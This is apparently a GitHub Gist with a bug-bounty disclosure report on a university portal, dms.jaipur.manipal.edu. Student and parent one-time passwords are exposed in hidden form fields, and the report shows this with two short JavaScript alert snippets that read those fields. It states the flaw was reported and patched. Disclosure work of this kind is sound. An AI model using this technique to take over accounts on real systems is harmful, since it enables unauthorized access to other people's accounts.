Last active
May 5, 2019 19:24
-
-
Save 0x48piraj/e645c199217a3501a2c438c95cde3bf8 to your computer and use it in GitHub Desktop.
REPORT #1: Taking control over any account (both parent's & student's) via exposed OTP (One Time Password) pin on client's side (dms.jaipur.manipal.edu)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author : PIYUSH RAJ (0x48piraj) | |
| # Impact : Taking control over any account (both parent's & student's) via exposed OTP (One Time Password) pin on client's side | |
| # Vulnerability : Improper handling of sensitive data | |
| # Target : dms.jaipur.manipal.edu | |
| # Exploit: Javascript Injection (Proof-of-Concept provided) | |
| # Patched : Yes (Reported on https://bounty.jaipur.manipal.edu) | |
| # Vulnerable parameters : | |
| - hdnOTP | |
| - hdnStudentOTP | |
| # POC for each category : | |
| 1. Hijacking Student's OTP : | |
| POC Code : | |
| alert("The Student's OTP is : " + document.getElementById("hdnStudentOTP").value); | |
| 2. Hijacking Parent's OTP : | |
| POC Code : | |
| alert("The Parent's OTP is : " + document.getElementById("hdnOTP").value); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment